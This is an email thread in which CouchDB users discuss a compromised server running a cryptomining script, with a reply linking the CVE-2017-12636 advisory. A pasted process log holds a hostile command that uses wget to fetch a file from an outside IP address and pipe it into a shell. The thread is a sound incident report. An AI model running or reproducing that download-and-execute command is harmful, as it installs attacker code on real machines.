sounds like http://docs.couchdb.org/en/2.1.1/cve/2017-12636.html
B. > On 16 Feb 2018, at 11:50, Ingo Radatz <thewh...@googlemail.com> wrote: > > Hi Michael, > > i have experienced the same - this is a mining script. You can find the shell > scripts in /tmp and in new database-folders of your couchdb (1.6.1?) > installation. Finally i have moved to a new vm because the script could > install itself again and again. > > Ingo > >> On 16. Feb 2018, at 12:31, Michael Bykov <m.by...@gmail.com> wrote: >> >> I see now in logs: >> >> couchdb 31167 0.0 0.0 6684 992 ? SNs 22:21 0:00 \_ >> /bin/sh -c wget -q http://94.250.253.178/logo6.jpg -O - | sh >> couchdb 31169 0.0 0.0 6684 1136 ? SN 22:21 0:00 | >> \_ sh >> couchdb 31264 0.0 0.0 4156 564 ? SN 22:21 0:00 | >> \_ sleep 60 >> couchdb 31193 0.0 0.1 55968 3772 ? SN 22:21 0:00 \_ >> /usr/sbin/sendmail -FCronDaemon -odi -oem -oi -t >> >> What shold be done? >> >> >> -- >> М. >> >> http://diglossa.ru >> xmpp://m.by...@jabber.ru >
